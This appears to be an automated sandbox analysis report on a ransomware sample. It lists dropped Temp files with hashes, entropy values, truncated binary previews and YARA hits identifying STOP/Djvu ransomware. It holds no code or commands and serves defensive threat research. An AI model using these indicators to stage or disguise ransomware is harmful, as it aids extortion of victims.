                                                                                                                                                                      Preview:Micro...9..t.}..t.nw.=.r=..V>U.\.....9NQ.'...Or..<.....C....*..B..v....................+..E.@..2.......$.t M....|.z;........n"vzK.sO.q.weZ.....T.t...wH.....<4..$..6..x=.7h..".*%S..G.T.o.E.......:...-XrB......../=1......X..........e..`HC....2)>.k.5._.8.....WD@...5.~.W.[l.^...F.{>].o.L[)...i..1...@...S.i..D.n.....Lw..L...2./.....h=....I.....5.{.5.F...Y.-P_.YW..o....`..-...zPZ.o..bo0.....;.......xq...R.C..D..)...'.5.1Uk6Y.R.)..;;..(..t...#.E..<...|.l..S....<F,{7.Y$....'....BD.......uT/....8v:$..{.....#..u....oM....c..*..-...M,.....O...rQZ.bd)...I.........J...Q....O..!.L.s.|h.B......@..E...... .a~..L..y.hq&.8l..<.2:.2....U...'F.$.....a(.i..Rp>.m<S..t........!.T...\.^....O...5u39..)2...ew.9....a...o...F.a..r..Q...v........(...........V.x.....p...S..P.e...XL..3.ws......i..6....Mdh.0i.?... ]~..%M....}.8..8V=.r.....&.v.z...i....hD$pO..:.Xx.....>...`rC|....U2#....b.:..B.^X2.f.6.R..1Nw.?.%{c7.7.....a.;.q..j.....V.....L.u|_H...q.K].....,....

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24210
                                                                                                                                                                      Entropy (8bit):7.992344970000963
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:384:WxALCcO1a0N75kZ0shhdRFPa+XkUbQGoFkcaA/zVStglzxH8s5yGsKXSiCO2njNk:WxA2QIkZhhhdra+3UGskcNjdxH8SsKCC
                                                                                                                                                                      MD5:00CBEC92837BFA61321FDFD73F8525BA
                                                                                                                                                                      SHA1:695BF1A199C63AFC5570BCA827CA307549D364E6
                                                                                                                                                                      SHA-256:9BD7F975B2E014CD14AD911B24F68248CD118FC908F70521E22468D37E04B5D3
                                                                                                                                                                      SHA-512:279892F7EB40A084135DF9C4ADC3C7ECC05BF0F74CF1552736ED086B72596FAE06A1819F41FBB3F04AC8684FBBB6FB5BE315ABEE295EB712728F814926239F98
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:03-10....`.BM..D.....-..1..SY..U...R.&..@UX-&.?.r95T..h..@..J..!.f&Z.....g..`.......JJ......t:......A3.5&...R.....haP.....a..=m<..q.^...rY...RKu..3.07_"...8.'.N..q2.FZ.C........Y.Qs...iqr.P.7.-ka..ww.Q7...;..i5.j.yu{zX.m.0p5..:.|..ye.,.'........[w.-.}..o.z.[t.b.{7...<=...qK..O...|G.GxT.....tE.......yZ0(=.J../I".^...HT...k...3...S..:W..p.}?1o...>...~l1Rl.....S.V."..&M..>G..j...c....Lh'.+G..X._..g..^.....m.........'K=.5..c-.!.w....&/.l.......l.n#LOfy.D....v.n.).)..7..a....A..!0^.h..8...!."..sA..CC01....p.Y......R#....Z..Rb.....?n......3...n._?.]..w....^%..8....#[...<....Y[.TR]...k..0..?C.......C.+\6_....@...l..r.'..&...|.e...u..p*|..-G.....cV...Y....{P..Y..Q..!6..0...(....w.]c5u......a.-.yR......i..C....<Z..!]34qA.WV.q3.yDZ..E:QRF.{.xi.v.J.B.V6XMO...F..<..r%[J.hW.P....0V...w....)..;.BK,Q..5..^....T...S.k.L..>K...TU.&;...-..s..C]....daO..<p......m...8........w.gT....k.-.....O~Y..]O.......R.......t..W^..N.97.V...'..z.TT.....=. S..O..J..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\hardz.bmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):602502
                                                                                                                                                                      Entropy (8bit):3.1758426787485
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:FVwMtY2yly08UBNHq213Lunp1HHxa1Xez99xR/evPObEzFgiBAePaHvt:dpylIUa2cnp1nxa1OHev2gdBRP0t
                                                                                                                                                                      MD5:C431AAEA8C96F062BAE6D3BA8DF9F3FD
                                                                                                                                                                      SHA1:A1F08C00B3F42BAB7283F3328CC32FCC8246B11F
                                                                                                                                                                      SHA-256:138769CE6EC5AA5F22285AC26F31314225C54ED3A688EAF158AEDE425B724D60
                                                                                                                                                                      SHA-512:E882C50B7A23210C982BBDF017FA8D39DFFDF7937BF4910DAF4CEA06E70620AEDDB540F009E4FA0A0F72B5E22DFBBDC126DC32E1F5C560B6D00E16297BCFDAFB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:BM80.KP.7.R. .+...Z.T..k.7....(....)........`....$.H.]<.)".......k.Ey..5.YyeL.Z........y....=...N......I|........"{....5I..T....&P....L.*H....H!..6...d....\.0.*q.W.#..T....6.4Z....W......?<..^.l&.5.Z....4......G..K......A....=7.j......0.....'.p.......1.&....&."....:..x?...`..3..yG O.`.....;)..>....v@'.-..}.O*.F|.'4.k;J..u...#?xRsh. f.ns.gj2EC.:..<.\Qn.....f. .p.+F$..> .oy..@Oy*..*L..e.A........-.......E..PD....\-....W.........~.:.G...U.GZ:...P....m...!....P6].<e.TTr1.W.KU.".m.>.?.T..T@........Y[...Mr...O.g......Sz.!...jG....g....d...g....I..0....,..Q...<.F0....v...0..I.}.ujJx..GH..%.^.k......3Y...0......D...e....I..H2...<.us.F..ko..f.x`..F.e#.i.s.i.p.@.....<@J."`.`.j.jC...&.......j.........cP....a)..tI....;...1...M.C.Jk;b.4.6.....5p8.f...R.#.....6-L-..U..nqo..B....5..6..... .K.}..k.....K....h.=b.iM.......8j{.....i....h.P."n\.....M.R...q|......B........N.H0x?2OH....7..g."...*q..*aw...8X.....5.He=U.v.~....~R...n...5.....p.|..#.uF..?Y.|.. h...Q.....D2..*.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\user.bmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):602502
                                                                                                                                                                      Entropy (8bit):3.17577967829685
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:hvRRL0ezf98Y55jHQ+HWuaSvbOh/02oKyQ4Qso8/vFaD5JqwnOVZqEi7UOk+H6P9:F34+v5jFsFivQ4k6NaXtn8cxG6ctht
                                                                                                                                                                      MD5:8FA66675D2993856C4B061351E985500
                                                                                                                                                                      SHA1:6215093AF66249CE476F0F1584C361C1F6016C39
                                                                                                                                                                      SHA-256:6DD02C3EECC8B6C862595C54D4E57391A439B7D28D0BB3E199F403EE2FAFA05A
                                                                                                                                                                      SHA-512:2AB60E0916EDCFC844C729DECCC6F57B8F6AB29D572AF71A91270E8B7DD05F2DE55AF679160BACEA699A25B7B74F3F8CB84C03748F0D6847893E8044BD12C336
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:BM80.......Q*r3lF.k...h|b..8\..Sp.)k.c:..o4.$..\.......bv.{.....z18.......q.M9.)I.....?........./..U.Xz.U..O.}..h.e.gT.V.qP6'......8o@J..^TS..X...c.~..j*.......ky..G_.U.t.s........p.....p..me.pT.0...x..(.UFT.Mt....g.&.....D&...d[.%....P..514..@...r..;...T.;e.k'L..7...Q....#.Nv....cv7.T..........w....K..+Q...T.p.,Z<J.....e..I.....oe.R.!..{.:..o....l...EE.y......vgb...}..O...N.Hn.kYp.]...o$K.!6N>.I....b0^*...;@y...f.y..UsJ.Y#.uYW.Y....(.$.../.R8.7..Q9:..H.0.._.V...k.........+.Vq.......-$$.r...jO.....1X:Z........t.V.y.i&}...V..x...D..5n@.N....Y[. ...3.L......v.l...oc..R..[......-....{.....DIC.B..0.;E.'\..Y ..`.^.6..<C...m%.p*.AG...r}L]FU.{..x.\@....`TL..1wW0.nE.b..\....{....R.....K."".o...o/...\.gF....?.#}.B$....nE....C MU...-....d.M..F..i!..j.EY}$..9...35{..{.B..P...uV......zl/...*{.oI.ou..90.nk8.w.W.c8(w.C.&(<.A...."{....;...=.FX...O..df....j..P..a>.....l.2.l....>....$.R.....Q.m....iI1........ z7..`.~...@n..S.S'.....DX.....;.g.:J..7...3

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\jusched.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4406
                                                                                                                                                                      Entropy (8bit):7.955143191874938
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:oJfzav5wIOGZGIw4tmiBGrVdeUQoYcSQ8:2zK5w/8GI3vBGp4t/Lz
                                                                                                                                                                      MD5:6CEFD9476619F511496C8995B0D6C80B
                                                                                                                                                                      SHA1:6069C02C294716AD6350A917EB9D61DF096CDBEC
                                                                                                                                                                      SHA-256:FB5C6CF41B77BF42929C3EAF1A054F8DE34147783D55C2DB6919C52F1032AB68
                                                                                                                                                                      SHA-512:B5F23E6D4495F15A297F4E2EFD0B55FC06078E9E7398D8FE624FF096C190E739AEBC8BE77320EBA801B2A9D84376A65BCFB3701DAE0089888BB1A29A97A0D86A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[2023.@t.Q.|.9.Xs.1..... ..Z......f.n(.........{) .....8.O....Tn..=h.<:3aT...f.m..."........puq.E..@"X.U.IR.V.~G/.yK.7S....H....y+.X.4/)....i....8.8..f....(..}..i.`I1.K.I.vtp~....pI;A{m..i...B. ....D..%..~.....">m;.8.I.#.O....E.\.Pa.+.}.k.O)[B4K.*.....y...2..5...8.d....,......A.q^..r@...#.. ..q#..7...)7K.$^B.v.G..+./V.v..u3.7....m.D........oSJfM..a..fd.bW>..0.lr.......>.....K..i.-..{......j.0...G.^9......~M.....d09.F...).L...fn.r%h.~.N..O.34....O..m.1..8l..v#c..)?....^....ct.....Qg.RW.1.M.a...,..J.F...vg=.y.|........lF.......,..1.W."k.I...V..}..F.._.|.X.w...H.&T...]....!....7C.....Y..{..Y.&.].23.Nc.Oy..3k...d^./:m..MR..*....A....%.q...K.{...\5eW..Z=.gYZ3... ..4..N.....-...B!w.;~.+s.6............#....#.X)..y ....;E..s&-..x...".....r|..aA.Lu:.].v`.$n7....6/........=yv..*..$x...C..Vs.`w..A...+...n.%....Z..D.9/\.b..!....<.......y.Q..&..).n}J...+......,.n....Jd..ds.3]...F.f.!.xv.p....i...|.@...o.o=.V..\..}...........um..WFt.3...:.o...E

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\msedge_installer.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):22093
                                                                                                                                                                      Entropy (8bit):7.991654534970632
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:384:rSMBmV2FC6VlnabCWh6mJO1o9RYanzwgcN9Uvju4ygu+vpFV+:rvmV2PnabMmJOgogyZB
                                                                                                                                                                      MD5:B00DCA29F41A400044C6B84B564EC7FC
                                                                                                                                                                      SHA1:046FA92A2B897489243DEA3C65FC01034567A81D
                                                                                                                                                                      SHA-256:1DAED82B114FEE04C0D0991F6A0F62DE17972625122FB78F624D9C14EBDEF2C5
                                                                                                                                                                      SHA-512:38C274E0A545ECAF661E532EBE5BC3CB7F060AD636A33959D4134F2746D7EFBD0D98DAC918A0EC8657FC666D77AA9C2E09D3DF1F016A1C4EEC12ABDA9C87E726
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[4004.`..:E.<pO.......L.H~.. .Bv...>.....UF.^[..e+..#(.|vhtf.....(@...g;...2..cH..].8.PQ{ GP.t#..'.d...d...f\..[.k.I<L.g.......)y....,./[.Dr....Ug.oF..l......$...@?-..YyRB..r....^54c....X..Z.....g.VB}..E..r...s.D..e."..6P......r...C"-.'..W..........t..k.?....'...551mT..w.yJ...W.Xg.P.e.?.@X....p7..w..M.O.Vt..&....M.S.u......B.G..A....Q..>$..J.......$....>..Z} .........k..*.ax..F.F.7Z.l.... D....p.....NN.y...'8.Q*..e.:..@c..S...@c.j.K. ..mT.y.q......l..>k.'U...,..o%4hY...R[@q1...........{...1....2.<}n~...c%x...|.Ju.....n......P.4F.Vt..S.wo......,....&N4....5....U'q VQ$.6.5[..ky..@.R.X...9nr....e...7.y.C..o...n..\9.5..E.?.O.h..3M..r.Z......}.rE.Sz.%...G.l.]...p>.S..j.a....".x..UT..G..>.... /.V..7..Um...a.-(y.........LS.b\.....<.Z....|5M..6....Q1....d.G!O:..(.^.$|I....d...:...@..2f..(..H.R^....(e....\.......8..p..}~&..:c.............+.+s$_"\|.0.+...........5|.H......B...Yuv3...W..X....Z../]..>d[0..$..[...o1].!H..2..r.zd..t.!Cq~.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\offline.session64

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66542
                                                                                                                                                                      Entropy (8bit):7.99743314954008
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:ViXn+uL8e/m6KSrNOMRgWpKj6OvATtj3ptV:ViXnr8e/wSrQYzpKjFObptV
                                                                                                                                                                      MD5:2603DA37257A8A247FB2C33FF9CF3958
                                                                                                                                                                      SHA1:3E107A84DD60774EEA2476378258126EA0DAE9DF
                                                                                                                                                                      SHA-256:F73B072B091AD2025929FBD13236992DB95CF19528EF8B500CF958BF3FDB05E9
                                                                                                                                                                      SHA-512:BE9FDDF5EBBECDDBE12B14CC04BD8F2C712FAF51862122B886361D372CFA93074FAADA742BF2ED8A991ABD683FEB5B036225477521FB7096CE3FB59A9EDA07E4
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:1G.f....&.K...U...B9O.r.... _G,.c......r.<.....v.:k=<..NC..w..K>...K.z.....3..9.h.....-.Gs...l..n>....8.4...;.>+.. AL.n....f.....G..-k9v.....R...Wn...:...=.<..Gi..m,..7.....kha.F.h.7v.-Q.%.F.m..ZD..n(...Mb...jgh.6#.......S.C.Uk.C.6...6.*.]..5....V....U......|.P.......:J.#f.2'..._....2..j."Y.....i....+a..*....[x.......^UK.....L"x.M .N.9...,..5~.&.F...g.........._....B.iI1.R.=S.!-..I...[.S.sB.........}....S.#.`..t...X.<..CQ.....(j..\R...............<1..5.p.g.....[`..$M.5t._J..y>..j..6..GP...~....'w..)g.)..W.....f'.......'...'"L....7....TY....)2D.{........Oq.D.r#.Wtu...j.0bh....v.h5.u..~....$..&^|....4...~J..<.g\(......lw.E..c..=]..M.t...o.....$v..Q1.'A..{@.. .8....*@.3.s.-....Z..9.....O...E.u......`.i...y?....D......~...SW..........cD.#.#..g|......h....@h.A@.(U.<....8H.].K..m.fYh.....$.s...4.k..s.7g.s...c..Q........y...j...w.......}90j..0..wJ..a....3.....!..&...a....7...Z).I.+........JJ..B.V..rv..A.K.....-+.?>a..n.`mm/t...M.(.y....C^.Bh

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\prep_Form_JSI_API_not_a_real_file_V8_perf.cache

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1045
                                                                                                                                                                      Entropy (8bit):7.803891580628994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yYYz45hYHQm9CyoP1PKDBbRdfe5gknybYdCoQcoqyuP2bD:yYs5wbP12B9oOknybYdCZD
                                                                                                                                                                      MD5:A850838C81B8F9B4E3D45C7867ED3392
                                                                                                                                                                      SHA1:C280EE636A54B4DF84BDAE815064A772A975C032
                                                                                                                                                                      SHA-256:690B3FE2C2FD65F04A6638E7F544115C17B4D52806E435DCED2AD589A650D9A5
                                                                                                                                                                      SHA-512:195A3C546F9F2D53FB8B6AD8B4039674DB045ED511604F17E080723BA460C80751203944F591DFC3B3A31254EC1D0B41CAD0852EC708419BB411DD396CF65562
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:RNWPRF.7fl.)..0G...a..y..?S..H.;/[q.......CL..xk/...(S..=....^..c....&....|.+.....n.hm.%SzcNd6..=....#|.h.B.....9lk..n|L.c.k...N. ../|..Y@......X.cn...2.r......h|....;*h......1........W.............Cv.......g.....6:bh...........u?b.~..7.#.....+.j+...@....a...@..l.%^.q7....(..4.t^"t.."~.f......w.j..^.A..<..q-]..B.m....b..k..6.....J..~..."..>.....!'m{.........U..dhm. ...j....]p.v.....#C....V...XU...F..h..#.<..f{.2.V.l...1..Mt...+kS._...$...A.O^..;x..QL..'..F......=..{I.......4VC......c.egL.......k0$b....k...........\..k.".A@...~.!X.\...9\`j.'..(.`.......r`d...-....6.>..4...?.T.|pNt~G..../-B.+}.l....ihs8.kx.".Z...6(..%;.kS..e.C...h..8.xg..7....>B....u......e.z.@..b.dQ....!.yq....*.h...Z..h.;C.I.q...P7.............i;...w.h...{..9V.2O1. ..y.fo.D....'Q.....z..@..:~.t.7..Q.:..6....C..........v.../.c.N.)..\..D...m.......j....5.f..m.........J..".".....>v....x.....=0.b......'Ux...(n...g.Q.. BU..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.cache

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):662049
                                                                                                                                                                      Entropy (8bit):6.820736284713287
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:+mpCFZK0nPRMf5t/EpwSkpyY8hLhzivQiifjhsLT3DZePTVakbYwsqVhKXHgjSD/:+mpQZ7Y5dEvYUL9cQiee/t4P+qVKTpp
                                                                                                                                                                      MD5:A05B5C31EF412F9D1A0635F4ABC5FB14
                                                                                                                                                                      SHA1:74774DDAA4DDFB668262AE4F84B935B9A7ADA5E8
                                                                                                                                                                      SHA-256:5AF963D4D9B175E10D8EE3D104EF17300143815DD907BF133BCA23674A057873
                                                                                                                                                                      SHA-512:2DCB17DFF578C0D86258B0C643E6645CAEFFEC5BC0F19ACA8AE912362FF119B0A63E4CCC3B12F9D2B852F02E87355243B29B0548E2F5DA1B15E8509A06DBA6A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:RNWPRzdp..\.0...",..R..(.M.u..T...=....G7E..f..^...`<.l...z.>..T..*.@]..V..../Gj,.`.d.].......:.`..q..2.+.gs^...+...[...#..s...\.e[..C.s..lm.k..r.P>....'.D....{.....ys)j6........|.d._4.<..`W=.|`5...@<!.WB..8..^..%>.5..{...c.n."...X.Y...;.R$..... ~.S;{l....:..k".`.......n}0.0..Q..7......6M|4.....4..9""...4.....*.Y..pSsM.fn.5....e.......E.W..-|..O(..i....?_.i.G.6..mt.s.*...J.t\JK.lJ.;.Xu.^...6.:\....]d.cH..4.?i.DE.M.].>.v..h%..Y.5..#........8>j.k.&..GB...........2U.U1.......6....f.j.q..H.....&.;!.9...5....d9?.+..X-0.j.FQ......:...48A.y.F...~....>..7P5..=/N...h.Q..LrU...eCcC@..6p.Q*.......Ei...Pg...u.3..7l._.F.8na...}....Nk.....@)t.......\XC,c4....f.....B.J,*...9..A.*@-....?.{....2.fb..*.Q.> .Ja...d/.5...........&,}.N....{..K.!m.O..I.?.of........t}.....FvH.:.YD.[..>.D8*..4q...'L.(...?L .Y.pT)..y...b..x.I..0...TV...>...~.{.0H=...A.kI......h .)-.F\X.oy.........{..v...........\.o..G..v...ZR........2.d...u.?.P..-.K..'..|b.x...8KWE.;.Q"=..M.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):193297
                                                                                                                                                                      Entropy (8bit):7.871132317136255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:D5ErIAnKBjWerxLtPpk76TXC4pVojpCYPmuihm/+DaClwc6/O8Wv+lWRQ5ukyS68:D5KIAnKtWuLtPQP+VHgmM+D5SBWmlsQH
                                                                                                                                                                      MD5:88D5CD2B2B159775F4FDCA2E7366636C
                                                                                                                                                                      SHA1:20EBF41A7CDCB0572BD7B4A60D1C8A4F9E3BB917
                                                                                                                                                                      SHA-256:3B5FAACCF50E761C5AEF518BC936157B31D10C9DDE8E132860CA15549023A185
                                                                                                                                                                      SHA-512:7196F7DF982245D19F3085B3BAC39E15D33C3B26F8C15715FCC8BDBABF5338FC02E64FA780C849E5870509AFBD62FA918101EDE38389DEC2D9C6CD70EFF2F9CA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:RNWPRh...D.."+....O..z.......}7fa.b/..^....r.c.#...?.-.h.|..Oy.i...H.G.a..'.P&y./._C..!.1.....s..Idh.\.I..>4XLz..$...Y...:sJ@.`.za......&.........D.sT;......~p....E........I(...nZ"..n.~...<..at#u..7.......'...x.5.E.jX.,m....h..>x.....P....3,7.h8....Gs....3....f.-8.....OyD.QBM.e.X...gV....Ch......VnD.!`'..Q.6...3.#.<(U9..u.Y...gD...^.t.._.2...G.f.>...P.:.).../.$.E..`ig..2..V..........x..smrJ./...e..;.3..a...w......(,.Xcs......4.*..?....R-<.n..i.....#...d>..l.....pvM.9.D..'eg.{...$.z..F....6...}...OY,...C|.N.9L..O4.\..>..m..Q...5..Y..u.kK(<3.'.....S7..M.j'*m..`_......G...V ...C..9Li..A..X....Z...=....N.E..+....l.2v..Xw.;..).4.07...$.. .....U...h.......i...C8|...x.qy...0..d\+..{:..k.$..Vb.Q..*.?%..Y...h..+....s.0.EX...%.xk.....,pi...0...k.)]..p.-....Q..a........$....yh.!.p...........U.&......&2..>.6.@......V...=Y.\..b....C.4...J..M..R..K.hI..~.m...&L.ee...:....&O>....(.2....4IP.....J...n...Sy.WX.....Y6.N......H.M0$.^.,..=K.V..@h<G.b.Ob-........

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\prep_ui_win32_bundle_V8_perf.cache

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):240241
                                                                                                                                                                      Entropy (8bit):7.548304848862768
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:ho9Cl+Zhe+/lQWUIhBPIaSEHCVoWYxsmht:i0opdUuPIalHCVo3
                                                                                                                                                                      MD5:C159C179D4F51D7049E29F8F566F633B
                                                                                                                                                                      SHA1:6999C63F2452341E878B8096A540604A2E82416C
                                                                                                                                                                      SHA-256:A8250DAD104225F5056EC566B245D4E6B982CE975C8EADE753A020ECDE0A4236
                                                                                                                                                                      SHA-512:60DB792A26BFC8EC194F43D79D91226803240431FBD26A9DF5380B116F3C73A07A03F6C70319AC154FCC439CF975024C6F92C71ED982C3C4833DB01BAF37B95C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:RNWPR.^.:*z......F.K2..Nt..|.....m......7.8.M..]..B.=.k7...z..A.T.........a..../....B...,.q.....N.V"...r2.R.c.Dj].:.'.F[|...,.Z.@.M.y.k... ..".q.j.z.(.....$I..c+.X......9..7r...j....D..JV.r...@.....)]].....S.!..K..v.pD..A.......:+..i...Qb..B.21'.....H.p.L<.....{...O..i.....mH..j.>.h........?D|...P.5............w..2..`.li1*Kr._..i.~.p...8..."z|.......z.~.....}}{.Q.e.CMu.h.@=.e.<*_H......oq7..W=..6.;x..P~.?..?..!...WO..d.Y.2....q#.XZ..Nn1.d-*9(E...V.u.h.P.,c....1..<2.[...&..gE...<.........i=.}Jn..........J.~.i.0.dv.l....t'4l@..._V....1z...{F......V....(.o....M..`.".........."........7t.f.0w.....K..y......P:d@"...+}.6ce].>$.y.k..x.....r.X.9..Q.A.c<....+.xu.W....1q....M:.7~.Tq.0........n..S.b.....([.;.c~.....H.&H.:Y\.r..i.>......5....j...nz^...J..%.q.O..~..6......dC..;...oCw..7.*.....m..Q.3}..4..g..XHD..........K..p...|... ..]N.&..}*.,..M.T..-,...)6?..Pp]..,.Y..p.p....=4....8J.S.g}-...6.v....aP.q.g.x..B.t....0...D K2.k..I..Z>9...-.X..c........

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1151310
                                                                                                                                                                      Entropy (8bit):6.929373407480307
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:gt0j/KGxOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8dWQHUq7W:m2uwAYZt6C31WeTVRPOhd7Uq7W
                                                                                                                                                                      MD5:4605FB1CE589925B9EE6DAFA3EC49F4B
                                                                                                                                                                      SHA1:11788700DB14C5D2B87595C3C703355A281AE5D6
                                                                                                                                                                      SHA-256:98133353158CFE6173CFE7CE1A6EFFAC016BDE005433A4B6D00581C25A44CEBA
                                                                                                                                                                      SHA-512:8FB7702392B3CF8984C3D4978251990411E3E974DC5A0373831D48EB56E55D4CD01ACD6EF38743E9E37A0ADBDD24E6437864BA71D28EC6FA0199959415458422
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, Author: unknown
                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, Author: ditekSHen
                                                                                                                                                                      Preview:MZ......I,>4.{....!.....!.0.._..Z....Z.ak..h.&.U&/86...q......33.F.@.k.v.S..f:..u.cT...G..{..7#.E.W}.f*#......T..D......5..H.L..6w_..Uc.{...*...Q.....W.g.0.u...t.....\..6.kU...!bb?.x}.G@....#...'...g.(.......^..$...GS[w./nH.d@...._...=A;..uK...,.U.M.}j..E.o@....4$.$.8HD=.%..:.ri.#J....WXZ....?.....w....0......GCI*..BV%.....e~."....E.m.}b,!.5.Q.8...z.....n.E..u.....1......y.;Z....,.g.....r.E.9.....&..n....}X%x...O.\..+F H.'h.?'.dL..c.T@.2a1...I.}......+..M-.......P.56D,.#.+&.E"..:..y.U......2.GC....[.q.~.....*...0..cZ....`....o.x(.5....sAi.......;..1...6......t`.:#../.E.Yy..{.):..w...K..#...]?.>..)...\.(9.8e,..AB....H4.].*.......iG.Gz.. u...*...........i[.%.i.C%wW.0....Vt...$!........f....[.,..>5...{.!t..8,.....r..ZE.....3}...........se....sH.)...V..:.\..fV.......m .e..U..+....(..?c....;..Xi....l;.5(.....%.".w.e....H.>.`..!.(.... .9...".~....s.sk.l1a......(.._......2_..."..x!F?,...sg..l..Z.!..r?.......qBg...bg..<('.......`....+.x..\.D;.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wct150C.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997616686237543
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:kmVKdWUiDDkzdx171LWyljK1k92EER8mm0ps09g3ZZxvYTf3pX7:ZaisRx1719N2kUEl0pX96ZxvYTxL
                                                                                                                                                                      MD5:5BEAB8757C3E333F7DA0E3CF6111FCE3
                                                                                                                                                                      SHA1:344F87AB4CD128AE699F272BD0558E2AA08D440F
                                                                                                                                                                      SHA-256:7F53B2A7E9FE928855B2C939E0E6FB90035F411B85857FD1C944E8264E2617FF
